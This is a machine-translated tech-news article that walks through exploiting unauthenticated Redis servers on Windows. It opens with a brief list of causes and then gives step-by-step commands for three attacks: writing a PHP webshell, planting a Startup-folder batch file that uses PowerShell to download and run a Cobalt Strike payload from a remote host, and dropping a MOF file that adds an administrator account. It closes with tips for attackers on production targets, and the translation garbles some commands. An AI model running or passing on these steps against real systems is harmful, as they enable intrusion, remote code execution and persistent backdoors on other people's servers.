Shulou(Shulou.com)05/31 Report--

Editor to share with you what is the cause of unauthorized Redis in the windows environment, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Causes of unauthorized Redis

1.redis is bound to the default port of 0.0.0.0 6379 and is directly exposed to the public network. There is no firewall for source trust protection.

two。 No password authentication is set, and you can log in to redis service remotely without secret.

Vulnerability hazard

1. Information disclosure, attackers can maliciously execute flushall to clean up data

two。 You can execute lua code through eval or write a backdoor file to disk through the data backup function

3. If running as root, an attacker can write a SSH public key file to the root account and log in to the victim server directly through SSH.

Utilization mode 01-write to webshell

1. Get the absolute path of web and write it directly to webshell

Redis-cli.exe-h redis-server]-p 6379

Redis redis-server > CONFIG SET dir c:/phpstudy/www

OK

Redis redis-server > CONFIG SET dbfilename shell.php

OK

Redis redis-server > set x ""

OK

Redis redis-server > save

OK

Just access shell.php directly.

Utilization mode 02-start item writing

The directory of startup items under windows is

C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

There are many ways to write, here we use Cobalt Strike to demonstrate

Start the CS server first with the following command:

Root@kali:~/cobaltstrike4.1#. / teamserver csip 123456

When starting the client, enter the password and address

Add a Listener listener

Select Attacks-Web Drive-By-Script Web Delivery, and select the Listener you just added

Click Launch to generate the following code

Powershell.exe-nop-w hidden-c\ "IEX ((new-object net.webclient) .downloadstring ('http://cs address: 80max a'))\"

Just save it as 1.bat.

There are two small details, one is that the dbfile itself has content, so the command must first wrap, two newline characters rn are needed to run properly after testing, and the other is that there are double quotes in the execution of the command, so it needs to be escaped.

Redis-cli.exe-h target ip-p 6379redis target ip:6379 > config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/" OKredis target ip:6379 > CONFIG SET dbfilename 1.batOKredis target ip:6379 > set x "/ r/n/r/npowershell.exe-nop-w hidden-c\" IEX ((new-object net.webclient) .downloadstring ('http://csip:80/a'))\"/r/n/r/n note that the double quotes here are escaped A space in the start menu of the windwos path OKredis 192.168.1.101 OKredis 6379 > saveOK

Check the server startup item and find that the command is written normally

Restart the target machine and go online successfully

Utilization mode 03-write to mof

If the web directory cannot be obtained because the machine cannot be restarted, if you want to raise the rights of Mof, the environmental limit can only be win2003.

Briefly describe the principle of mof rights promotion:

Mof is a file of the windows system (on c:/windows/system32/wbem/mof/nullevt.mof) called "managed object format" that monitors process creation and death every five seconds. In fact, it is to have the root permission of mysql, and then use the root permission to execute the mof we uploaded. After a certain period of time, the mof will be executed, and there is a vbs script in the mof, and most of the vbs is the command of cmd to add the administrator user.

In other words, the mof files in the `c:/windows/system32/wbem/mof/ `directory will be automatically executed every 5 seconds, so that you do not need to restart the machine to obtain permissions.

First, save the following code as an admin.txt file:

# pragma namespace ("\\.\ root\ subscription") instance of _ EventFilter as $EventFilter {EventNamespace = "Root\ Cimv2"; Name = "filtP2"; Query = "Select * From _ InstanceModificationEvent"Where TargetInstance Isa" Win32_LocalTime "" And TargetInstance.Second = 5 "; QueryLanguage =" WQL "; instance of ActiveScriptEventConsumer as $Consumer {Name =" consPCSV2 "; ScriptingEngine =" JScript "; ScriptText =" var WSH = new ActiveXObject ("WScript.Shell") nWSH.run ("net.exe user admin admin / add"); Instance of _ _ FilterToConsumerBinding {Consumer = $Consumer; Filter = $EventFilter;}

The command to be executed here is to add a user named admin

And then execute

(echo-e "nn"; cat admin.txt; echo-e "nn") > foo.txt

Change to the redis directory and run the following command

After a while, you will see that the user has been added successfully. (the local test was unsuccessful, writing to the mof folder was successful, but it was executed all the way to the bad folder.)

Add a way to use it under linux:

On WCTF2019 Final, which ended on July 7, 2019, Pavel Toporkov, a member of LC/BC, introduced a new version of RCE utilization of redis at the sharing meeting.

Https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

Use the script as follows

Https://github.com/LoRexxar/redis-rogue-server

There will be a lot of problems in actual combat in the production environment.

Redis has a slightly larger amount of data. After writing shell to a file, php will refuse to execute it because the file is too large.

It is useless for Ubuntu,Debian to write a scheduled task to rebound.

Writing / etc/passwd will overwrite the original / etc/passwd. It is impossible to change it and then change it back.

Use the command 'KEY *' to blow up directly in the production environment.

The above is all the content of the article "what is the cause of unauthorized Redis in windows environment". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.